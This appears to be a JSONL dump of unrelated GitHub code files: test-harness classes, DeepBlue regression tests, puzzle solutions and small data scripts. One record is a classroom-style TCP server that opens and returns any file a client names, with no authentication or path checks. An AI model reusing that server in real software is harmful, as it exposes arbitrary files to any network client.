into working directory\",\n \"LIB_CONTENTS\":lib_contents}\n self._write_whiteboard_yaml(desc)\n \n home = self._safe_param(\"HOME\")\n srcdir = Util.get_work_dir(home)\n libdir = os.path.join(home,\"lib\")\n \n for book in lib_contents:\n shutil.copyfile(os.path.join(libdir,book),os.path.join(srcdir,book))\n # \n \n 
def _file_location(self):\n sub_home=self._safe_param(\"SUBMISSION_HOME\")\n assignment=self._safe_param(\"ASSIGNMENT\")\n student=self._safe_param(\"STUDENT\")\n file_type=self._safe_param(\"FILE_TYPE\")\n\n file_loc,status,_ = Util.file_location(sub_home,assignment,student,file_type)\n\n if status==\"Missing\" or file_loc==None: # should be true at the same time\n self.fail(\"Missing submission\")\n\n return file_loc\n","repo_name":"WilliamScarbro/guac","sub_path":"src/SetUpNoTar.py","file_name":"SetUpNoTar.py","file_ext":"py","file_size_in_byte":3602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"2372704826","text":"'''\nCreated on Feb 13, 2013\n\n@author: cmcculloch\n'''\nimport wx\nfrom TestThread import TestThread\nimport threading\nfrom copy import copy\nfrom CustomEvents import ResultEvent, StopEvent, ProgressEvent\nfrom CustomEvents import EndStepEvent\n\n\nclass Bundle():\n '''\n A bundle object contains all the necessary information to run tests on the\n test system.\n '''\n def __init__(self, output, parent):\n '''\n Initialize the internal data.\n '''\n self.parameters = None\n self.module = None\n self.limits = None\n self.validate = None\n self.uutCom = None\n self.db = None\n self.__testData = [] # List of { \"TestName\" : [Test, Results] }\n self.__testCode = [] # List of pre-compiled test code\n self.testResult = None # Temp store test results (after limit check)\n self.testResponse = None # Temp store UUT response to test\n self.testLimits = None # Temp hold limits object (holds units, etc)\n self.moduleData = None # Temp store of any test data generated\n self.__testName = \"\" # Full name of test\n self.__testThread = None # Thread running the test\n self.__guiOutput = output # Point to GUI output text control\n self.__parent = parent # Parent window\n self.__message = \"\" # Message from GUI\n self.__validMessage = False # Flag for a valid message present\n self.__msgLock = threading.Lock() # Message lock\n self.__validMsgLock = threading.Lock() # Flag lock\n self.__notifyThread = None # Will be the notification thread\n \n \n def haveMessage(self):\n '''\n Return True if a message is ready for the test thread from GUI.\n '''\n return self.__validMessage\n\n\n def getMessage(self):\n '''\n Return the message and reset flags.\n '''\n self.__msgLock.acquire()\n msg = copy(self.__message) # Make a copy that is thread safe\n self.__message = \"\" # Reset the message\n self.__msgLock.release()\n\n self.__validMsgLock.acquire()\n self.__validMessage = False\n self.__validMsgLock.release()\n return msg\n \n \n def setMessage(self, msg, wait = False):\n '''\n Set the message from GUI to test thread.\n '''\n self.__msgLock.acquire()\n self.__message = copy(msg) # Make a copy that is thread safe\n self.__msgLock.release()\n \n self.__validMsgLock.acquire()\n self.__validMessage = True\n self.__validMsgLock.release()\n \n if wait: # Wait until other thread got the message\n flag = False\n while not flag: # TODO: Should have a timeout here?\n self.__validMsgLock.acquire()\n if not self.__validMessage: # Other thread got message\n flag = True\n self.__validMsgLock.release()\n \n return msg\n\n \n def output(self, text):\n '''\n Send the text to the GUI text control via an event handler.\n This is thread-safe.\n '''\n wx.PostEvent(self.__parent, ResultEvent(\"%s\\n\" % text))\n\n\n def stop(self, text):\n '''\n Send a signal to stop the test.\n '''\n wx.PostEvent(self.__parent, StopEvent(\"%s\\n\" % text))\n 
self.__testThread = None\n self.__testCode = [] # To force full reload next time we execute\n \n \n def isTestRunning(self):\n ''' Return true if the test thread is active and running. '''\n state = False\n if self.__testThread is not None:\n state = True\n return state\n \n \n def packTestData(self, state = True):\n '''\n If state is True, then Store all test results, response, limits, etc.\n in testData[], otherwise do nothing.\n '''\n if state:\n self.__testData.append({ self.__testName :\n { \"response\" : self.testResponse ,\n \"limits\" : self.testLimits,\n \"result\" : self.testResult }\n })\n \n \n def load(self, parameters, module, validate, limits):\n ''' Load the bundle with the test functions '''\n self.parameters = parameters\n self.module = module\n self.validate = validate\n self.limits = limits\n \n \n def start(self):\n '''\n Start the module test code.\n '''\n if self.__testThread is None:\n self.__testThread = TestThread(self.__testCode, self)\n self.__testThread.start()\n else:\n raise RuntimeError(\"Test thread was not deleted properly\")\n \n \n \n def setUUTCom(self, uutCom):\n ''' Initialize the uutCom object '''\n self.uutCom = uutCom\n \n \n def setDB(self, db):\n ''' Initialize the database object '''\n self.db = db\n \n \n def setTestName(self, name):\n '''\n Set the name of the test. This name will be used to store all the\n test data and test results from the test.\n '''\n self.__testName = name\n \n \n def appendCompiledModule(self, module):\n '''\n Append the compiled module to the list to be run later.\n '''\n self.__testCode.append(module)\n \n\n def incrementProgress(self):\n '''\n Increment the progress bar in the GUI.\n '''\n wx.PostEvent(self.__parent, ProgressEvent(None))\n\n\n def setNotificationThread(self, notifyThread):\n '''\n Sets the notification thread so that the test code can modify the\n state of the notifications when necessary.\n '''\n self.__notifyThread = notifyThread\n \n \n def DBNotify(self):\n '''\n Toggle the database notification icon.\n '''\n self.__notifyThread.setMsg(\"DATABASE\")\n \n \n def networkNotify(self, state):\n '''\n Set the network notification icon according to state parameter.\n '''\n if state:\n self.__notifyThread.setMsg(\"NETWORK ON\")\n else:\n self.__notifyThread.setMsg(\"NETWORK OFF\")\n\n\n def endStep(self):\n '''\n Tell the GUI that the step is over.\n '''\n wx.PostEvent(self.__parent, EndStepEvent(True))","repo_name":"pyridoxus/cthulu-public","sub_path":"Bundle.py","file_name":"Bundle.py","file_ext":"py","file_size_in_byte":6513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"44861540036","text":"from socket import *;\r\nserverPort = 12000\r\nserverName = 'DESKTOP-9CJQB77'\r\nserverSocket = socket(AF_INET,SOCK_STREAM)\r\nserverSocket.bind((serverName,serverPort))\r\nserverSocket.listen(1)\r\nprint(\"The server is ready to receive\")\r\nwhile 1:\r\n connectionSocket,addr = serverSocket.accept()\r\n file_1 = connectionSocket.recv(1024)\r\n file = open(file_1,'r')\r\n file2 = file.read(1024)\r\n connectionSocket.send(file2)\r\n file.close()\r\n connectionSocket.close()\r\n","repo_name":"taruntmk2712/CN","sub_path":"Socket/Lab/TCP/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"33460424266","text":"import numpy as np\nimport bisect\n\nwith open('15.in') as infile:\n input = infile.read()\n\nlines = 
input.splitlines()\n\nmatrix = []\n\nfor line in lines:\n matrix.append(list(map(int, list(line))))\n\nmatrix = np.array(matrix)\n\n\ndef navigate(matrix):\n queue = [[0, 0, 0]]\n\n distance = np.copy(matrix)\n distance.fill(np.sum(matrix))\n distance[0, 0] = 0\n\n added = np.zeros(np.shape(matrix))\n added[0, 0] = 1\n\n dirs = [[-1, 0], [1, 0], [0, -1], [0, 1]]\n\n while len(queue) > 0:\n [value, x, y] = queue.pop(0)\n\n for dir in dirs:\n nx = x + dir[0]\n ny = y + dir[1]\n\n if nx >= 0 and nx < len(matrix) and ny >= 0 and ny < len(matrix[0]):\n distance[nx, ny] = min(\n distance[nx, ny], value + matrix[nx, ny])\n if added[nx, ny] == 0:\n bisect.insort(queue, [distance[nx, ny], nx, ny])\n added[nx, ny] = 1\n\n return distance\n\n\ndef expand_matrix(matrix):\n xlen = len(matrix)\n ylen = len(matrix[0])\n new_matrix = np.zeros(shape=(xlen * 5, ylen * 5), dtype=int)\n\n for i in range(5):\n for j in range(5):\n new_matrix[xlen * i: xlen *\n (i + 1), ylen * j: ylen * (j + 1)] = (matrix + i + j + 8) % 9 + 1\n\n return new_matrix\n\n\n# distance = navigate(matrix)\n# print(distance)\n\n\nnew_matrix = expand_matrix(matrix)\ndistance = navigate(new_matrix)\nprint(distance[-1, -1])\n","repo_name":"vhurryharry/AoC","sub_path":"2021/15/15.py","file_name":"15.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"25516873092","text":"import helpers\n\nfrom deepblue_client import DeepBlueClient\n\n\nclass TestBugs(helpers.TestCase):\n\n # Bug: Error when insert repeat_masker annotation - 67203100\n def test_no_start_position(self):\n file_content = \"\"\"1036\\t1146\\t43\\t0\\t18\\tchr19\\t59118819\\t1000\\t-10000\\t+\\t(TTAGGG)n\\tSimple_repeat\\tSimple_repeat\\t5\\t165\\t0\\t1\\n585\\t1080\\t161\\t1\\t0\\tchr19_gl000208_random\\t0\\t719\\t-91970\\t-\\tALR/Alpha\\tSatellite\\tcentr\\t-41\\t719\\t1\\t4\"\"\"\n\n rmsk = [\n \"BIN\",\n \"swSCORE\",\n \"MILLI_DIV\",\n \"MILLI_DEL\",\n \"MILLI_INS\",\n \"NAME\",\n \"START\",\n \"END\",\n \"GENO_LEFT\",\n \"STRAND\",\n \"repNAME\",\n \"REP_CLASS\",\n \"REP_FAMILY\",\n \"REP_START\",\n \"REP_END\",\n \"REP_LEFT\",\n \"ID\"\n]\n format = \",\".join(rmsk)\n\n epidb = DeepBlueClient(address=\"localhost\", port=31415)\n self.init_base(epidb)\n\n (r, a) = epidb.add_annotation(\"repeat_masker\", \"hg19\", None, file_content, format, None, self.admin_key)\n\n self.assertFailure(r, a)\n\n self.assertEquals(a, \"120002:The CHROMOSOME is missing in the format. 
Please, inform the CHROMOSOME column in the Format.\")\n\n rmsk2 = [\n \"BIN\",\n \"swSCORE\",\n \"MILLI_DIV\",\n \"MILLI_DEL\",\n \"MILLI_INS\",\n \"CHROMOSOME\",\n \"START\",\n \"END\",\n \"GENO_LEFT\",\n \"STRAND\",\n \"repNAME\",\n \"REP_CLASS\",\n \"REP_FAMILY\",\n \"REP_START\",\n \"REP_END\",\n \"REP_LEFT\",\n \"ID\"\n]\n format2 = \",\".join(rmsk2)\n\n (r, a) = epidb.add_annotation(\"repeat_masker2\", \"hg19\", None, file_content, format2, None, self.admin_key)\n\n self.assertSuccess(r, a)\n\n def test_invalid_eamp_character(self):\n epidb = DeepBlueClient(address=\"localhost\", port=31415)\n self.init_base(epidb)\n\n epidb.add_biosource(\"rostrolateral thalamic nucleus of Butler Saidel\", \"\", {}, self.admin_key)\n epidb.add_biosource(\"testing cool\", \"\", {}, self.admin_key)\n epidb.add_biosource(\"testing ugly &Saidel\", \"\", {}, self.admin_key)\n epidb.add_biosource(\"testing weird \", \"\", {}, self.admin_key)\n epidb.add_biosource(\"testing closed \", \"\", {}, self.admin_key)\n epidb.add_biosource(\"!'234456789<<<<><<<;;.,.,-,>\", \"\", {}, self.admin_key)\n\n (r,a) = epidb.list_biosources(None, self.admin_key)\n self.assertSuccess(r,a)\n\n biosource_names = [x[1] for x in a]\n self.assertEquals(biosource_names, ['K562', 'Brain', 'rostrolateral thalamic nucleus of Butler Saidel', 'testing cool', 'testing ugly &Saidel', 'testing weird ', 'testing closed ', \"!'234456789<<<<><<<;;.,.,-,>\"])\n\n def test_wrong_chromosomes_usage(self):\n epidb = DeepBlueClient(address=\"localhost\", port=31415)\n self.init_base(epidb)\n\n cpg_island = \",\".join([\n \"CHROMOSOME\",\n \"START\",\n \"END\",\n \"NAME\",\n \"LENGTH\",\n \"NUM_CPG\",\n \"NUM_GC\",\n \"PER_CPG\",\n \"PER_CG\",\n \"OBS_EXP\"\n ])\n\n file_data = None\n with open(\"data/cpgIslandExtFull.txt\", 'r') as f:\n file_data = f.read()\n\n res = epidb.add_annotation(\"Cpg Islands\", \"hg19\", \"Complete CpG islands\", file_data, cpg_island, None, self.admin_key)\n self.assertSuccess(res)\n\n size_total = len(file_data.split(\"\\n\"))\n\n (status, qid_cpg) = epidb.select_annotations(\"Cpg Islands\", \"hg19\", \"chr1\", None, None, self.admin_key)\n\n (s, req) = epidb.count_regions(qid_cpg, self.admin_key)\n self.assertSuccess(s, req)\n c = self.count_request(req)\n\n self.assertEquals(2462, c)\n\n total = 0\n (status, cq1) = epidb.select_annotations(\"Cpg Islands\", \"hg19\", \"chr1\", None, None, self.admin_key)\n (s, req1) = epidb.count_regions(cq1, self.admin_key)\n c1 = self.count_request(req1)\n\n (status, cq2) = epidb.select_annotations(\"Cpg Islands\", \"hg19\", \"chr7\", None, None, self.admin_key)\n (s, req2) = epidb.count_regions(cq2, self.admin_key)\n c2 = self.count_request(req2)\n\n (status, cq3) = epidb.select_annotations(\"Cpg Islands\", \"hg19\", \"chr18\", None, None, self.admin_key)\n (s, req3) = epidb.count_regions(cq3, self.admin_key)\n c3 = self.count_request(req3)\n\n (status, cq4) = epidb.select_annotations(\"Cpg Islands\", \"hg19\", \"chrX\", None, None, self.admin_key)\n (s, req4) = epidb.count_regions(cq4, self.admin_key)\n c4 = self.count_request(req4)\n\n total = int(c1) + int(c2) + int(c3) + int(c4)\n\n (status, qid_count) = epidb.select_annotations(\"Cpg Islands\", \"hg19\", [\"chr1\",\"chr7\",\"chr18\",\"chrX\"], None, None, self.admin_key)\n (s, req) = epidb.count_regions(qid_count, self.admin_key)\n c = self.count_request(req)\n self.assertEquals(c, total)\n\n cpg_island_chrs = 
\"\"\"chr1\nchr10\nchr11\nchr11_gl000202_random\nchr12\nchr13\nchr14\nchr15\nchr16\nchr17\nchr17_ctg5_hap1\nchr17_gl000204_random\nchr17_gl000205_random\nchr18\nchr19\nchr1_gl000191_random\nchr1_gl000192_random\nchr2\nchr20\nchr21\nchr22\nchr3\nchr4\nchr4_ctg9_hap1\nchr4_gl000193_random\nchr4_gl000194_random\nchr5\nchr6\nchr6_apd_hap1\nchr6_cox_hap2\nchr6_dbb_hap3\nchr6_mann_hap4\nchr6_mcf_hap5\nchr6_qbl_hap6\nchr6_ssto_hap7\nchr7\nchr8\nchr8_gl000197_random\nchr9\nchr9_gl000199_random\nchr9_gl000200_random\nchr9_gl000201_random\nchrUn_gl000211\nchrUn_gl000212\nchrUn_gl000213\nchrUn_gl000214\nchrUn_gl000215\nchrUn_gl000216\nchrUn_gl000217\nchrUn_gl000218\nchrUn_gl000219\nchrUn_gl000220\nchrUn_gl000221\nchrUn_gl000222\nchrUn_gl000223\nchrUn_gl000224\nchrUn_gl000225\nchrUn_gl000228\nchrUn_gl000229\nchrUn_gl000231\nchrUn_gl000235\nchrUn_gl000236\nchrUn_gl000237\nchrUn_gl000240\nchrUn_gl000241\nchrUn_gl000242\nchrUn_gl000243\nchrX\nchrY\"\"\"\n\n (status, qid_count) = epidb.select_annotations(\"Cpg Islands\", \"hg19\", cpg_island_chrs.split(\"\\n\"), None, None, self.admin_key)\n (s, req) = epidb.count_regions(qid_count, self.admin_key)\n c = self.count_request(req)\n self.assertEquals(size_total, c)\n\n def test_not_find_genome_and_in_order_chromosoms(self):\n epidb = DeepBlueClient(address=\"localhost\", port=31415)\n self.init_base(epidb)\n\n genome_data = \"\"\"chr1 1000000\nchr2 900000\nchr3 500000\nchrX 100000\"\"\"\n epidb.add_genome(\"Genome Example\", \"Example of Genome for the Manual\", genome_data, self.admin_key)\n\n x = epidb.chromosomes(\"Genome Example\", self.admin_key)\n self.assertEquals(x, ['okay', [['chr1', 1000000], ['chr2', 900000], ['chr3', 500000], ['chrX', 100000]]])\n\n def test_sample_search_from_synonym(self):\n epidb = DeepBlueClient(address=\"localhost\", port=31415)\n self.init_base(epidb)\n\n s = epidb.add_biosource(\"Bio Source A\", \"\", {}, self.admin_key)\n self.assertSuccess(s)\n\n s = epidb.set_biosource_synonym(\"Bio Source A\", \"BSA\", self.admin_key)\n self.assertSuccess(s)\n\n s = epidb.add_sample(\"BSA\", {}, self.admin_key)\n self.assertSuccess(s)\n\n s = epidb.list_samples(\"Bio Source A\", {}, self.admin_key)\n self.assertSuccess(s)\n\n list_bio_source_a = s[1]\n self.assertTrue(len(list_bio_source_a) > 0)\n\n s = epidb.list_samples(\"BSA\", {}, self.admin_key)\n self.assertSuccess(s)\n\n list_bsa = s[1]\n self.assertTrue(len(list_bsa) > 0)\n\n self.assertEqual(list_bio_source_a, list_bsa)\n\n\n # Bug that does not allow to set the true hierarchy\n # A is parent of B, that is parent of C that is parent of D\n # A is also parent of D\n def test_biosource_true_hierarchy(self):\n epidb = DeepBlueClient(address=\"localhost\", port=31415)\n self.init(epidb)\n\n self.assertSuccess(epidb.add_biosource(\"AAA\", None, {}, self.admin_key))\n self.assertSuccess(epidb.add_biosource(\"BBB\", None, {}, self.admin_key))\n self.assertSuccess(epidb.add_biosource(\"CCC\", None, {}, self.admin_key))\n self.assertSuccess(epidb.add_biosource(\"DDD\", None, {}, self.admin_key))\n\n res = epidb.set_biosource_parent(\"AAA\", \"BBB\", self.admin_key)\n self.assertSuccess(res)\n res = epidb.set_biosource_parent(\"BBB\", \"CCC\", self.admin_key)\n self.assertSuccess(res)\n res = epidb.set_biosource_parent(\"CCC\", \"DDD\", self.admin_key)\n self.assertSuccess(res)\n res = epidb.set_biosource_parent(\"AAA\", \"DDD\", self.admin_key)\n self.assertSuccess(res)\n res = epidb.set_biosource_parent(\"DDD\", \"BBB\", self.admin_key)\n self.assertFailure(res)\n 
self.assertSuccess(epidb.add_biosource(\"EEE\", None, {}, self.admin_key))\n res = epidb.set_biosource_parent(\"DDD\", \"EEE\", self.admin_key)\n self.assertSuccess(res)\n res = epidb.set_biosource_parent(\"AAA\", \"EEE\", self.admin_key)\n self.assertSuccess(res)\n res = epidb.set_biosource_parent(\"EEE\", \"BBB\", self.admin_key)\n self.assertFailure(res)\n res = epidb.set_biosource_parent(\"EEE\", \"CCC\", self.admin_key)\n self.assertFailure(res)\n res = epidb.set_biosource_synonym(\"AAA\", \"macaco\", self.admin_key)\n self.assertSuccess(res)\n\n expected = [['bs1', 'AAA', 'biosources'], ['bs2', 'BBB', 'biosources'], ['bs3', 'CCC', 'biosources'], ['bs4', 'DDD', 'biosources'], ['bs5', 'EEE', 'biosources']]\n (res, s) = epidb.search(\"macaco\", None, self.admin_key)\n self.assertSuccess(res, s)\n self.assertEquals(s, expected)\n\n (res, s) = epidb.search(\"AAA\", None, self.admin_key)\n self.assertSuccess(res, s)\n self.assertEquals(s, expected)\n\n def test_biosource_true_hierarchy(self):\n epidb = DeepBlueClient(address=\"localhost\", port=31415)\n self.init_base(epidb)\n sample_id = self.sample_ids[0]\n\n data = \"chr1\\t100\\t110\\t1\\nchr1\\t200\\t400\\t0\\nchr1\\t400\\t500\\t1\\nchr1\\t200\\t400\\t0\\n\"\n format = \"CHROMOSOME,START,END,SCORE\"\n\n (res, a_1) = epidb.add_experiment(\"test\", \"hg19\", \"H3K4me3\", sample_id, \"tech1\", \"ENCODE\", \"wgEncodeBroadHistoneH1hescH3k27me3StdPk.bed from ENCODE\", data, format, None, self.admin_key)\n\n self.assertSuccess(res, a_1)\n\n (s, q) = epidb.select_regions(\"test\", \"hg19\", None, None, None, None, \"chr1\", None, None, self.admin_key)\n\n (s, tl) = epidb.tiling_regions(150000000, \"hg19\", \"chr1\", self.admin_key)\n\n res, qid_4 = epidb.aggregate(q, tl, \"SCORE\", self.admin_key)\n s, req = epidb.get_regions(qid_4, \"CHROMOSOME,START,END,@AGG.MIN,@AGG.MAX,@AGG.MEAN,@AGG.COUNT\", self.admin_key)\n self.assertSuccess(s, req)\n\n rs = self.get_regions_request(req)\n\n self.assertEquals(rs, \"chr1\\t0\\t150000000\\t0.0000\\t1.0000\\t0.5000\\t4\")\n\n def test_empty_result(self):\n epidb = DeepBlueClient(address=\"localhost\", port=31415)\n self.init(epidb)\n\n s, g1 = epidb.add_genome(\"hg19\", \"\", \"chr1 10000\\nchr2 30000\", self.admin_key)\n self.assertSuccess(s, g1)\n s, t1 = epidb.add_technique(\"chip-seq\", \"\", None, self.admin_key)\n self.assertSuccess(s, t1)\n\n (s, q) = epidb.select_regions(None, \"hg19\", None, None, \"chip-seq\", None, None, 1000, 2000, self.admin_key)\n self.assertSuccess(s, q)\n (s, req) = epidb.get_regions(q, \"CHROMOSOME,START,END\", self.admin_key)\n self.assertSuccess(s, q)\n rs = self.get_regions_request(req)\n self.assertEquals(rs, \"\")\n\n\n def test_empty_no_permission_column_type(self):\n epidb = DeepBlueClient(address=\"localhost\", port=31415)\n self.init_base(epidb)\n\n res, cid = epidb.create_column_type_category(\"PLUS_MINUS_DOT\", \"Region strand: +, -, .\", [\"+\", \"-\", \".\"], self.admin_key)\n\n s, (u_id, u_key) = epidb.add_user(\"user\", \"email\", \"institution\", self.admin_key)\n self.assertSuccess(s)\n\n s = epidb.modify_user_admin(u_id, \"permission_level\", \"NONE\", self.admin_key)\n self.assertSuccess(s)\n\n info = epidb.info(cid, u_key)\n self.assertEqual(info, ['error', '100100:Insufficient permission. Permission LIST_COLLECTIONS is required.'])\n info_e1 = epidb.info(\"e1\", u_key)\n self.assertEqual(info_e1, ['error', '100100:Insufficient permission. 
Permission LIST_COLLECTIONS is required.'])\n info_e2 = epidb.info(\"me\", u_key)\n self.assertEqual(info_e2, ['okay', [{'name': 'user', 'institution': 'institution', 'id': 'u3', 'permission_level': 'NONE', 'type': 'user', 'email': 'email'}]])\n\n\n def test_include_invalid_regions(self):\n epidb = DeepBlueClient(address=\"localhost\", port=31415)\n self.init_base(epidb)\n\n data = \"\"\"chr1\\t1\\t100000000000000000\nchr10\\t666\\t66610000\nchrY\\t12345\\t1234567\"\"\"\n (s, a) = epidb.add_annotation(\"test annotation\", \"hg19\", \"testing\", data, \"CHROMOSOME,START,END\", {\"HI\": \"HOW ARE YOU?\"}, self.admin_key)\n self.assertFailure(s, a)\n self.assertEquals(a, \"Error while reading the BED file. Line: 0. - '100000000000000000 is not a valid end position'\")\n\n data = \"\"\"chr1\\t2147483647\\t2147483648\"\"\"\n (s, a) = epidb.add_annotation(\"test annotation\", \"hg19\", \"testing\", data, \"CHROMOSOME,START,END\", {\"HI\": \"HOW ARE YOU?\"}, self.admin_key)\n self.assertFailure(s, a)\n self.assertEquals(a, \"Invalid region: 2147483647 - 2147483648. It is beyond the length of the chromosome chr1 .\")\n\n #info() on user queries #91\n def test_info_on_user_queries(self):\n epidb = DeepBlueClient(address=\"localhost\", port=31415)\n self.init_base(epidb)\n\n res, user_one = epidb.add_user(\"user1\", \"test1@example.com\", \"test\", self.admin_key)\n self.assertSuccess(res, user_one)\n s, tmp_user = epidb.modify_user_admin(user_one[0], \"permission_level\", \"GET_DATA\", self.admin_key)\n self.assertSuccess(s)\n\n res, user_two = epidb.add_user(\"user2\", \"test2@example.com\", \"test\", self.admin_key)\n self.assertSuccess(res, user_two)\n s, tmp_user = epidb.modify_user_admin(user_two[0], \"permission_level\", \"GET_DATA\", self.admin_key)\n self.assertSuccess(s)\n\n (s, t1) = epidb.tiling_regions(100, \"hg19\", \"chr1\", user_one[1])\n s = epidb.info(t1, user_one[1])\n self.assertEquals(s, ['okay', [{'_id': 'q1', 'type': 'tiling', 'user': 'user1', 'args': {\"genome\" : \"hg19\", \"size\" : 100, \"chromosomes\" : [ \"chr1\" ] }}]])\n s = epidb.info(t1, user_two[1])\n self.assertEquals(s, ['error', \"111003:You are not the query ID 'q1' owner and neither an administrator.\"])\n s = epidb.info(t1, self.admin_key)\n self.assertEquals(s, ['okay', [{'_id': 'q1', 'type': 'tiling', 'user': 'user1', 'args': { \"genome\" : \"hg19\", \"size\" : 100, \"chromosomes\" : [ \"chr1\" ] }}]])\n\n\n def test_bug_do_not_reuse_existing_query(self):\n epidb = DeepBlueClient(address=\"localhost\", port=31415)\n self.init_base(epidb)\n\n sample_id = self.sample_ids[0]\n\n data = \"chr1\\t100\\t110\\t1\\nchr1\\t200\\t400\\t0\\nchr1\\t400\\t500\\t1\\nchr1\\t200\\t400\\t0\\n\"\n format = \"CHROMOSOME,START,END,SCORE\"\n\n (res, a_1) = epidb.add_experiment(\"test\", \"hg19\", \"H3K4me3\", sample_id, \"tech1\", \"ENCODE\", \"wgEncodeBroadHistoneH1hescH3k27me3StdPk.bed from ENCODE\", data, format, None, self.admin_key)\n self.assertSuccess(res, a_1)\n\n (s, q0) = epidb.select_regions(\"test\", \"hg19\", None, None, None, None, \"chr1\", None, None, self.admin_key)\n (s, q1) = epidb.query_experiment_type(q0, \"peaks\", self.admin_key)\n\n (s, q00) = epidb.select_regions(\"test\", \"hg19\", None, None, None, None, \"chr1\", None, None, self.admin_key)\n (s, q11) = epidb.query_experiment_type(q0, \"peaks\", self.admin_key)\n\n self.assertEqual(q0, q00)\n self.assertEqual(q1, 
q11)\n\n\n","repo_name":"MPIIComputationalEpigenetics/DeepBlue","sub_path":"server/tests/test_cases/bugs.py","file_name":"bugs.py","file_ext":"py","file_size_in_byte":14785,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"}
+{"seq_id":"36868788847","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n\nxi = 0\nv0 = 100\nyi = 0\ng = 9.81\nclass Projectile:\n def __init__(s,theta):\n s.theta = theta\n s.T = 2 * v0 * np.sin(np.radians(s.theta)) / g\n s.t = np.arange(0,s.T,0.1)\n s.x = xi + (v0 * np.cos(np.radians(s.theta)) * s.t)\n s.y = yi + (v0 * np.sin(np.radians(s.theta)) * s.t) - ((g * (s.t ** 2))/2)\n\nfor i in range(0,90):\n line = Projectile(i)\n plt.plot(line.x, line.y, label = line.theta)\n\nplt.margins(0.01)\nplt.legend()\nplt.show()\n","repo_name":"seekermind/codes","sub_path":"computationalPhysicsProject/projectile1/x.py","file_name":"x.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"6084517612","text":"'''\nAuthor: liubei\nDate: 2021-07-06 10:34:26\nLastEditTime: 2021-07-06 10:58:33\nDescription: \n'''\n#\n# @lc app=leetcode.cn id=17 lang=python3\n#\n# [17] Letter Combinations of a Phone Number\n#\n# https://leetcode-cn.com/problems/letter-combinations-of-a-phone-number/description/\n#\n# algorithms\n# Medium (56.90%)\n# Likes: 1383\n# Dislikes: 0\n# Total Accepted: 291.9K\n# Total Submissions: 512.9K\n# Testcase Example: '\"23\"'\n#\n# Given a string containing digits from 2-9 inclusive, return all possible letter combinations that the number could represent. The answer may be returned in any order.\n# \n# A mapping of digits to letters (the same as on the telephone buttons) is given below. Note that 1 does not map to any letters.\n# \n# \n# \n# \n# \n# Example 1:\n# \n# \n# Input: digits = \"23\"\n# Output: [\"ad\",\"ae\",\"af\",\"bd\",\"be\",\"bf\",\"cd\",\"ce\",\"cf\"]\n# \n# \n# Example 2:\n# \n# \n# Input: digits = \"\"\n# Output: []\n# \n# \n# Example 3:\n# \n# \n# Input: digits = \"2\"\n# Output: [\"a\",\"b\",\"c\"]\n# \n# \n# \n# \n# Constraints:\n# \n# \n# 0 \n# digits[i] is a digit in the range ['2', '9'].\n# \n# \n#\n\n# @lc code=start\nclass Solution:\n def dfs(self, digits, idx, dm, combins, ans):\n if idx >= len(digits):\n return\n\n chars = dm[int(digits[idx])]\n\n for c in chars:\n newcombins = combins + c\n\n if idx == len(digits) - 1:\n ans.append(newcombins)\n\n self.dfs(digits, idx + 1, dm, newcombins, ans)\n\n def letterCombinations(self, digits):\n dm = [[], [], ['a', 'b', 'c'], ['d', 'e', 'f'], ['g', 'h', 'i'], ['j', 'k', 'l'], ['m', 'n', 'o'], ['p', 'q', 'r', 's'], ['t', 'u', 'v'], ['w', 'x', 'y', 'z']]\n ans = []\n\n self.dfs(digits, 0, dm, '', ans)\n\n return ans\n# @lc code=end\n\ns = Solution()\ns.letterCombinations('23')\n","repo_name":"liubei90/leetcode","sub_path":"17.电话号码的字母组合.py","file_name":"17.电话号码的字母组合.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"12918567523","text":"from matplotlib import pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nfrom sklearn.preprocessing import MinMaxScaler, StandardScaler\n\ndf = sns.load_dataset('titanic')\n# print(df.head())\n\ndf2 = df[['survived','pclass','age','parch']]\n# print(df2)\n\n# print(df2.mean())\n# sns.heatmap(df2.isnull(),cmap='viridis',yticklabels=False)\ndf3 = df2.fillna(df2.mean())\n# print(df3)\n# sns.heatmap(df3.isnull(),cmap='viridis', yticklabels=False)\n\nX = df3.drop('survived', axis=1)\n# print(X)\n\ny = df3['survived']\n# print(y)\n\n\nfrom sklearn.model_selection import train_test_split\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=101)\n\n\n# Standard Scaler => mean=0, variance=1
\nsc = StandardScaler()\nsc.fit(X_train)\n\n#mean\n# print(f'mean : {sc.mean_}')\n#standard deviation\n# print(f'standard deviation : {sc.scale_}')\n# print(X_train.describe())\n\nX_train_sc = sc.transform(X_train)\nX_test_sc = sc.transform(X_test)\n\n# print(X_train_sc)\n\nX_train_sc = pd.DataFrame(X_train_sc, columns=['pclass','age','parch'])\n# print(X_train_sc)\nX_test_sc = pd.DataFrame(X_test_sc, columns=['pclass','age','parch'])\n# print(X_test_sc)\n# print(X_train_sc.describe().round(2))\n\n# MinMaxScaler => min=0, max=1\nmms = MinMaxScaler()\nmms.fit(X_train)\nX_train_mms = mms.transform(X_train)\n# print(X_train_mms)\nX_test_mms = mms.transform(X_test)\n\nX_train_mms = pd.DataFrame(X_train_mms, columns=['pclass','age','parch'])\n# print(X_train_mms)\nX_test_mms = pd.DataFrame(X_test_mms, columns=['pclass','age','parch'])\n# print(X_test_mms)\n# print(X_train_mms.describe().round(2))\n\n\n# before and after scaling, the distribution of the feature data does not 